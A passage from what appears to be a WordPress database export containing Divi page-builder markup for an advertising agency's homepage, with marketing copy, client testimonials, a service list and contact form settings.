Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-4.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2021-04-02 06:29:42','2021-04-02 06:29:42','',134,'https://wthtest1.in8.cdn-alpha.com/?p=804',0,'revision','',0),(806,1,'2021-04-02 06:38:14','2021-04-02 06:38:14','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.6\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2021/03/banner-1.jpeg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising Agency</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.6\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Packed with creative skills; we have been serving as one of the best agencies in the region.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to 